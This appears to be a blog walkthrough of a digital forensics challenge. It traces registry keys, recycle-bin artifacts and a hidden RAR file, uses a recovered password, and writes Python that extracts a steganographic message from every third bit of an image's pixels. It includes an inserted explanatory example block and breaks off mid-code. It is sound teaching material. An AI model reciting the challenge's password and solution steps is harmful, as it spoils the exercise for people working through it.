<span style="color: white;">TargetObject: </span><span style="color: #fcff01;"><b>HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</b></span><span style="color: white;">\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefile</span>
<span><span style="color: white;">TargetObject: </span><b><span style="color: #fcff01;">HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</span></b><span style="color: white;">\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe</span></span>
<span><span style="color: white;">TargetObject: </span><b><span style="color: #fcff01;">HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</span></b><span style="color: white;">_Classes\grvopen\shell\open\command\(Default)</span></span>
<span><span style="color: white;">TargetObject: </span><b><span style="color: #fcff01;">HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</span></b><span style="color: white;">_Classes\grvopen\shell\open\command\(Default)</span></span>
<span><span style="color: white;">TargetObject: </span><b><span style="color: #fcff01;">HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</span></b><span style="color: white;">_Classes\grvopen\shell\open\command\(Default)</span></span>
</pre></div>
</div><div><br /></div><div><div>Looking into the file <i>$IVM18SN.txt</i>, we see "<i>D:\mynotes.txt</i>".<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfjiiSQJ2zbAid4YX9HXF5m3a2YhAttTxsB_xIV72v1GL92dObeLijlMN2mrJ1iOYQQhyid9SeA_JW05Y0_gGQTrOLcpF4FGuGiapx_3AGYSi-jdYsSZTq2y4VIfx39DZ3pv1XI79M7NRTXdQ_Tt9bu0Dp9anxV4yyLIiQ-chlkFIisXuwkP9WvV81qE/s473/mynotes.txt%20image.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="409" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfjiiSQJ2zbAid4YX9HXF5m3a2YhAttTxsB_xIV72v1GL92dObeLijlMN2mrJ1iOYQQhyid9SeA_JW05Y0_gGQTrOLcpF4FGuGiapx_3AGYSi-jdYsSZTq2y4VIfx39DZ3pv1XI79M7NRTXdQ_Tt9bu0Dp9anxV4yyLIiQ-chlkFIisXuwkP9WvV81qE/w554-h640/mynotes.txt%20image.PNG" width="554" /></a></div> </div><div><br /></div><div>But where is that file? I do not see it at first glance on the disk.</div><div><br /></div><div>Looking at the file <i>$RVM18SN.txt</i>, we see what seems to be a password.<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR-0LbbJN0mJ-EP2c8pWzMiPhYvIbLzwaz3QLjgVZRigjkkfkZ0R-o3iLM9BfOJeUE5N7jlYmN8jGweaDP24xB_YGo7JEkUI7_jUhgdtCQAlmTDfcVe374hZwcnUXZxvWlZqjWJmdFuDVquYK39gjSP334l9EhsCMlSJkBHmf8J-JrVWZNrBBokvnwc8o/s638/I%20guess%20I%20will%20choose%20this%20password.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="638" height="486" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR-0LbbJN0mJ-EP2c8pWzMiPhYvIbLzwaz3QLjgVZRigjkkfkZ0R-o3iLM9BfOJeUE5N7jlYmN8jGweaDP24xB_YGo7JEkUI7_jUhgdtCQAlmTDfcVe374hZwcnUXZxvWlZqjWJmdFuDVquYK39gjSP334l9EhsCMlSJkBHmf8J-JrVWZNrBBokvnwc8o/w640-h486/I%20guess%20I%20will%20choose%20this%20password.PNG" width="640" 
/></a></div><br /></div><div><br /></div><div>The creation of this content is attributed to <i>Newman </i>because of the SID.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdazra89hL2t3LplI1LM2unOwwuLC2sBaDOG93crqQ5q8XxhJzcRMlZnrgSjWTlCoM4aODf5HFefM9LnULSxdYQ-TmyVU5In1kA7SBwmzWraeLemQLA6AKmuD3Ee_KX3ICMohqBTk3Cmpgcw0j6T-hAKXT8KlTiLJ_-qEjeR3BqW_lv7Uv4RR4rSwAPyA/s753/Attribution%20of%20file%20creation%20to%20user%20with%20SID-1010.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="753" height="516" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdazra89hL2t3LplI1LM2unOwwuLC2sBaDOG93crqQ5q8XxhJzcRMlZnrgSjWTlCoM4aODf5HFefM9LnULSxdYQ-TmyVU5In1kA7SBwmzWraeLemQLA6AKmuD3Ee_KX3ICMohqBTk3Cmpgcw0j6T-hAKXT8KlTiLJ_-qEjeR3BqW_lv7Uv4RR4rSwAPyA/w640-h516/Attribution%20of%20file%20creation%20to%20user%20with%20SID-1010.PNG" width="640" /></a></div></div><div><br /></div><div>Learning a little bit more about this file via the "<i>Data Artifacts</i>" tab, we see originally it seemed to have been in the "<i>d:\mynotes.txt</i>" file</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCA2Z2Jq0RuIji2G_0puZZbIKgfgiOVNuovtIS8hfWps-rrVNPr03NBWkhg9yeSVIqm-4TTh8tydEyqLvxAgAlhp_136j2dfb1B-LfUdq2_n-I4iU4-nAVaKT_JXPj6wQsK0vnNgnoOR0TdwgvB-HZsQBH-SDhYXJiYm_nKcZvNCDUY3MF72pm2YMAds/s1092/Data%20Artificats%20for%20mynotes.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="525" data-original-width="1092" height="308" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCA2Z2Jq0RuIji2G_0puZZbIKgfgiOVNuovtIS8hfWps-rrVNPr03NBWkhg9yeSVIqm-4TTh8tydEyqLvxAgAlhp_136j2dfb1B-LfUdq2_n-I4iU4-nAVaKT_JXPj6wQsK0vnNgnoOR0TdwgvB-HZsQBH-SDhYXJiYm_nKcZvNCDUY3MF72pm2YMAds/w640-h308/Data%20Artificats%20for%20mynotes.PNG" width="640" /></a></div></div><div><br /></div><div><br /></div><div>We still have not seen the <i>mynotes.txt</i> file itself; it was found in the recycle bin, which suggests it was deleted. We also know it was in the root of the <i>d:\</i> drive, as this was the drive letter recorded. </div><div><br /></div><div>Let's look at the root of <i>vol2</i>, as this is the only partition of interest at this time.</div><div><br /></div><div>At this point, we have found the original file and can export it.<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAlEpTCliprLqUaYvkxwS3fhCKDXWfohtg8JBzJp8tSJTAAn9QQTc6dQ__cNHeh3hrO7e0jo1D3BP9YFa-GgIdsoEE8urFYZTHwlzs-Fn_gywZbnSAJargluzj8Wuu0IzSyRhNkWaUV57M_LTQx5BE92eB2KeTdVqRkHCMg_d5xcXko4cY2VON82JPNZM/s875/Recover%20Extracted%20my%20notes%20file.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="875" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAlEpTCliprLqUaYvkxwS3fhCKDXWfohtg8JBzJp8tSJTAAn9QQTc6dQ__cNHeh3hrO7e0jo1D3BP9YFa-GgIdsoEE8urFYZTHwlzs-Fn_gywZbnSAJargluzj8Wuu0IzSyRhNkWaUV57M_LTQx5BE92eB2KeTdVqRkHCMg_d5xcXko4cY2VON82JPNZM/w640-h390/Recover%20Extracted%20my%20notes%20file.PNG" width="640" /></a></div></div><div><br /></div><div><br /></div><div>We also see "<i>vessel.png</i>". 
When this is extracted, we get:</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg01S7yGfLYYdugULg-2lDiXWC7lUuWwFaMkMwdvFIBhylH-1-gGbYLgEoOMOYR6TSPeeEkqaNVPWkOxZ61x-Bftbcp2IyXtWq4ONgBES0Y3xeeIA_9OfLIrhMRalNzBBoYcppFveAKaLQaPpcNg1MV1PkOHPjd5vlodOY3kdOhDgochDtGS2AzlpJ-S2M/s963/Hidden%20Image%20-%20friends.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="699" data-original-width="963" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg01S7yGfLYYdugULg-2lDiXWC7lUuWwFaMkMwdvFIBhylH-1-gGbYLgEoOMOYR6TSPeeEkqaNVPWkOxZ61x-Bftbcp2IyXtWq4ONgBES0Y3xeeIA_9OfLIrhMRalNzBBoYcppFveAKaLQaPpcNg1MV1PkOHPjd5vlodOY3kdOhDgochDtGS2AzlpJ-S2M/w640-h464/Hidden%20Image%20-%20friends.PNG" width="640" /></a></div></div><div><br /></div><div><br /></div><div>We also see what looks like an alternate data stream via <i>vessel.png:hidden</i>.<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPeYzziBFSBATGxq6pCe9EbK4hvdnp6_fnMsrVenGUQyfbEM9UMZQavwUsNYGShRryhoS-caPXtjIhmtp0D-SndxswgKQHaGJqoptmW2SOkM0qWZAsPBxqt78k7_0F5ofvG4nWdW_Z6iH_TGVQ4nBwSZbeagflHTOPrlaqHAHa_xy96InK1K7XdpH24Ic/s1110/rar%20file%20in%20ads%20-%20extracted..PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="701" data-original-width="1110" height="404" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPeYzziBFSBATGxq6pCe9EbK4hvdnp6_fnMsrVenGUQyfbEM9UMZQavwUsNYGShRryhoS-caPXtjIhmtp0D-SndxswgKQHaGJqoptmW2SOkM0qWZAsPBxqt78k7_0F5ofvG4nWdW_Z6iH_TGVQ4nBwSZbeagflHTOPrlaqHAHa_xy96InK1K7XdpH24Ic/w640-h404/rar%20file%20in%20ads%20-%20extracted..PNG" width="640" /></a></div></div><div><br /></div><div>I extracted the file and attempted to verify whether an Alternate Data Stream is actually being used:</div></div><div><br 
/></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\Users\securitynik\Documents>dir vessel.png_hidden /R</span>
<span style="color: white;"> Volume in drive C has no label.</span>
<span style="color: white;"> Volume Serial Number is 9A7A-30CD</span>
<span style="color: white;"> Directory of C:\Users\securitynik\Documents</span>
<span style="color: white;">07/29/2023 12:06 PM 398 vessel.png_hidden</span>
<span style="color: white;"> 1 File(s) 398 bytes</span>
<span style="color: white;"> 0 Dir(s) 46,440,538,112 bytes free</span>
</pre></div>
</div><div><br /></div><div><div>This does not seem to be using an Alternate Data Stream. However, we did see from the image above that it was a <i>.RAR</i> file. Let's leverage 7zip to open this file.</div><div><br /></div><div>When I opened the file with 7zip, it asked for a password. Time to take advantage of the credentials found earlier: "<i>r3c0v3r1ng_d3l3t3d_d4t4_1s_fun</i>". Hey Jean, couldn't you have chosen an easier password?! Guess you wanted to ensure no one was able to easily guess the password. Good job!</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0BqvB1RuXXPNfH1Tj3jTZc3d6Ul_GNt-QW0EHiC8qJI68USDZlWhEgSFk4Ro2d5_hjSIITemU0AybEldcxaP6H7jpaegXRzB_j5OAVia4M7h2NGvDzBkaQKVSbiiTfYdWUg1IJZaiEw3L8URX2yABrVEZTIUDCxOHOFwda6eNoBGJjbtyIMgdo-pphyc/s701/7-zip%20open%20file%20with%20found%20password.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="457" data-original-width="701" height="418" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0BqvB1RuXXPNfH1Tj3jTZc3d6Ul_GNt-QW0EHiC8qJI68USDZlWhEgSFk4Ro2d5_hjSIITemU0AybEldcxaP6H7jpaegXRzB_j5OAVia4M7h2NGvDzBkaQKVSbiiTfYdWUg1IJZaiEw3L8URX2yABrVEZTIUDCxOHOFwda6eNoBGJjbtyIMgdo-pphyc/w640-h418/7-zip%20open%20file%20with%20found%20password.PNG" width="640" /></a></div><br /></div><div><br /></div><div>This created a file named "<i>instructions.txt</i>" with the following content.</div><div><br /></div><div>"<i><b>Hello ! I am glad you got my message :) So the data from that pesky Jerry and his friends is inside the image and should be 629 bytes long. Remember, every 3 bits is where it's at!</b></i>"</div><div><br /></div><div>Guess this means I have to revisit the image. 
</div><div><br /></div><div><br /></div><div><span style="font-size: large;"><b>Code to recover the message</b></span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Read the file containing the image</span>
<span style="color: white;">fp = open(file=r'c:/tmp/hidden.png', mode='rb')</span>
<span style="color: white;"># Convert the raw bytes to hex</span>
<span style="color: white;">raw_bytes = fp.read().hex(sep=' ', bytes_per_sep=1).split(' ')</span>
<span style="color: white;"># Close the file</span>
<span style="color: white;">fp.close()</span>
<span style="color: white;"># View the length of the file to ensure it is the same as the size on disk</span>
<span style="color: white;">print(len(raw_bytes))</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">557903</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get a view of some of the raw bytes</span>
<span style="color: white;">raw_bytes[:10]</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['89', '50', '4e', '47', '0d', '0a', '1a', '0a', '00', '00']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Convert the hex strings to a list of integers</span>
<span style="color: white;">int_list = [ int(byte, 16) for byte in raw_bytes ]</span>
<span style="color: white;"># Get a snapshot</span>
<span style="color: white;">print(int_list[:10])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">[137, 80, 78, 71, 13, 10, 26, 10, 0, 0]</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Convert those numbers to bits</span>
<span style="color: white;">bit_list = [ format(item, '0>8b') for item in int_list ]</span>
<span style="color: white;">print(bit_list[:10])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['10001001', '01010000', '01001110', '01000111', '00001101', '00001010', '00011010', '00001010', '00000000', '00000000']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Condense the bit list to smash it all together</span>
<span style="color: white;">bits_condensed = ''.join(bit_list)</span>
<span style="color: white;"># Get the first 100 bits</span>
<span style="color: white;">bits_condensed[:100]</span>
</pre></div>
</div><div><br /><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'1000100101010000010011100100011100001101000010100001101000001010000000000000000000000000000011010100'</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Now extract every third bit</span>
<span style="color: white;">#bits_by_3 = bits_condensed[::3]   # note: [::3] would take positions 0, 3, 6, ..., not the ones used below</span>
<span style="color: white;">#bits_by_3</span>
<span style="color: white;"># Step an index by 3 and keep the bit just before it, i.e. positions 2, 5, 8, ...</span>
<span style="color: white;">bits_at_3 = []</span>
<span style="color: white;">index = 0</span>
<span style="color: white;">while index <= len(bits_condensed)-10:</span>
<span style="color: white;">    index += 3</span>
<span style="color: white;">    #print(index, bits_condensed[index-1])</span>
<span style="color: white;">    bits_at_3.append(bits_condensed[index-1])</span>
<span style="color: white;"># Get the first 25 bits</span>
<span style="color: white;">print(bits_at_3[:25])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['0', '0', '0', '1', '0', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Condense the bits into one string</span>
<span style="color: white;">bits_at_3_condensed = ''.join(bits_at_3)</span>
<span style="color: white;"># Get the first 100 bits</span>
<span style="color: white;">bits_at_3_condensed[:100]</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'0001011001000010000010000000001100000100000000000100000000000000000000000000000000100010000000000001'</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get the bits expanded to recreate the bytes</span>
<span style="color: white;">bits_expanded = [ bits_at_3_condensed[i:i+8] for i in range(0, len(bits_at_3_condensed), 8) ]</span>
<span style="color: white;"># Get the first 10 bytes</span>
<span style="color: white;">print(bits_expanded[:10])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['00010110', '01000010', '00001000', '00000011', '00000100', '00000000', '01000000', '00000000', '00000000', '00000000']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Convert the bits to int values</span>
<span style="color: white;"># https://stackoverflow.com/questions/58016378/is-there-a-way-to-convert-bit-to-int</span>
<span style="color: white;"># Each 8-bit group is parsed as an int, then mapped to its character with chr()</span>
<span style="color: white;">bits_to_int = [ chr(int(value, 2)) for value in bits_expanded ]</span>
<span style="color: white;"># Get the first 10 characters</span>
<span style="color: white;">print(bits_to_int[:10])</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">['\x16', 'B', '\x08', '\x03', '\x04', '\x00', '@', '\x00', '\x00', '\x00']</span></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get the final bytes</span>
<span style="color: white;"># Note: joining with ' ' and encoding as UTF-8 alters the byte stream (0x20 separators are inserted, and characters above 0x7f become two bytes)</span>
<span style="color: white;">final_bytes = bytes(' '.join(bits_to_int), encoding='utf-8')</span>
<span style="color: white;">final_bytes[:30], len(final_bytes)</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">(b'\x16 B \x08 \x03 \x04 \x00 @ \x00 \x00 \x00 " \x00 \x1c \x12 \xc3\x8f',
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> 464930)</span></div><div><br />The above returned 464930 bytes. The note stated the data is 629 bytes long, so the expectation would be to extract the first 629 bytes from this. I did not go this route. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Convert these values to hex</span>
<span style="color: white;">final_bytes.hex(sep=' ', bytes_per_sep=1)</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">'16 20 42 20 08 20 03 20 04 20 00 20 40 20 00 20 00 20 00 20 ...</span></div><div><br /></div><div>Above shows the bytes. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Write these bytes out to a file</span>
<span style="color: white;">fp = open(file=r'c:/tmp/3bits.txt', mode='wb')</span>
<span style="color: white;">fp.write(final_bytes)</span>
<span style="color: white;">fp.close()</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>It is sad to say, but after extracting every third bit and putting everything together, I was not able to recover the message. Time to reach out to Jean to understand where I went wrong.</div><div><br /></div><div><div>After reaching out to Jean for clarity on what the ask really is, he mentioned that in setting up the challenge he focused on the pixel values, not the raw bytes of the PNG file. Interestingly, this is the one area that seems to have caused many folks to question their analysis. It is also the one area where we provided the most hints.</div><div><br /></div><div>Changing my approach.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">from PIL import Image</span>
<span style="color: white;">import numpy as np</span>
</pre></div>
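<div>Both attempts above (first over the raw PNG file bytes, then over the decoded pixel values) come down to one operation: take the third bit of every group of three, regroup the result into bytes and read it as text. The following is an added example, not code from the walkthrough or from the challenge author. It embeds a constructed message into a constructed grayscale carrier using that same (assumed) every-third-bit scheme, recovers it from the pixel values, and then applies the identical extraction to a zlib-compressed copy of the pixels, which is what a PNG's IDAT data looks like, to show why the file-bytes approach cannot work. Only the standard library is used, so PIL and NumPy are not needed to run it.</div>

```python
import zlib

# Added example for this walkthrough (not the challenge author's code).
# The embedding scheme (message bits at positions 2, 5, 8, ... of the
# pixel bit stream) and the carrier image are constructed assumptions.


def pixels_to_bits(pixels):
    """Render each 8-bit pixel value as an 8-character bit string and join them."""
    return ''.join(format(p, '08b') for p in pixels)


def every_third_bit(bits):
    """Keep the third bit of every group of three (positions 2, 5, 8, ...).

    This is the slice form of the walkthrough's loop, which steps an index
    by 3 and appends bits[index - 1] each time."""
    return bits[2::3]


def bits_to_bytes(bits):
    """Regroup a bit string into bytes, dropping an incomplete trailing byte."""
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def extract_message(pixels, n_bytes):
    """Recover n_bytes carried in every third bit of the pixel stream."""
    return bits_to_bytes(every_third_bit(pixels_to_bits(pixels)))[:n_bytes]


def embed_message(pixels, message):
    """Write the message bits into positions 2, 5, 8, ... of the pixel bit
    stream (the hypothetical scheme assumed here) and return the new pixels."""
    bits = list(pixels_to_bits(pixels))
    msg_bits = ''.join(format(b, '08b') for b in message)
    if len(msg_bits) * 3 > len(bits):
        raise ValueError('carrier too small for message')
    for k, mb in enumerate(msg_bits):
        bits[2 + 3 * k] = mb
    joined = ''.join(bits)
    return [int(joined[i:i + 8], 2) for i in range(0, len(joined), 8)]


def constructed_carrier(width=64, height=16):
    """Deterministic grayscale-like carrier (constructed), so this runs offline."""
    return [(x * 7 + y * 13) % 256 for y in range(height) for x in range(width)]


def demo():
    """Embed, recover from the pixels, then try the same on compressed bytes."""
    secret = b'id : 1\nName : Peterman Catalog\n'  # constructed sample text
    stego_pixels = embed_message(constructed_carrier(), secret)
    from_pixels = extract_message(stego_pixels, len(secret))
    # A PNG stores its pixel rows zlib-compressed inside IDAT chunks, so
    # running the extraction over the file bytes instead of the decoded
    # pixels yields noise. This is the trap the first attempt fell into.
    compressed = zlib.compress(bytes(stego_pixels))
    from_file_bytes = extract_message(compressed, len(secret))
    return from_pixels, from_file_bytes


if __name__ == '__main__':
    recovered, wrong = demo()
    print('from pixels     :', recovered)
    print('from file bytes :', wrong)
```

<div>Feeding the first three pixel values from the walkthrough (213, 231, 181) to <i>pixels_to_bits</i> gives the same 24-bit string shown further down, and <i>every_third_bit</i> of it starts with 01101001, the letter "i" that opens the recovered message. The slice <i>bits[2::3]</i> produces exactly what the index-stepping loop in the walkthrough produces; the loop merely stops a few bits before the end, which does not affect the first 629 bytes.</div>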
</div><div><br /></div><div>Look at the image pixels as a NumPy matrix.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">img_pixels_vals = np.array(Image.open(fp=r'c:/tmp/hidden.png'))</span>
<span style="color: white;">img_pixels_vals</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">array([[213, 231, 181, ..., 209, 231, 245],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [209, 231, 245, ..., 245, 245, 245],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [245, 245, 245, ..., 245, 245, 245],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> ...,
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [ 28, 28, 28, ..., 224, 224, 224],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [ 32, 32, 32, ..., 224, 224, 224],
</span><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;"> [ 42, 42, 42, ..., 224, 224, 224]], dtype=uint8)</span></div><div><br /></div><div>Get the shape of this array.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">img_pixels_vals.shape</span>
</pre></div>
</div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">(1024, 1536)</span></div><div><br /></div><div>Let's flatten the matrix above and squeeze the dimensions. Squeezing brings it down to one dimension. At the same time, print the length of the flattened array. </div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"># Let's flatten the matrix above and squeeze the dimensions
# Squeezing brings it down to 1 dimension
img_pixels_flat = img_pixels_vals.reshape(1, -1).squeeze()
# Print out the bytes and get the length of the flatten pixel
img_pixels_flat, len(img_pixels_flat)</span></pre></div></div></div><div><br /></div><div><span style="color: #cccccc; font-family: Consolas, "Courier New", monospace; font-size: 18px; white-space: pre;">(array([213, 231, 181, ..., 224, 224, 224], dtype=uint8), 1572864)</span></div><div><br /></div><div><div>Get these pixel values as bits and print the first 24 bits (3 bytes).</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Get these pixel values as bits</span>
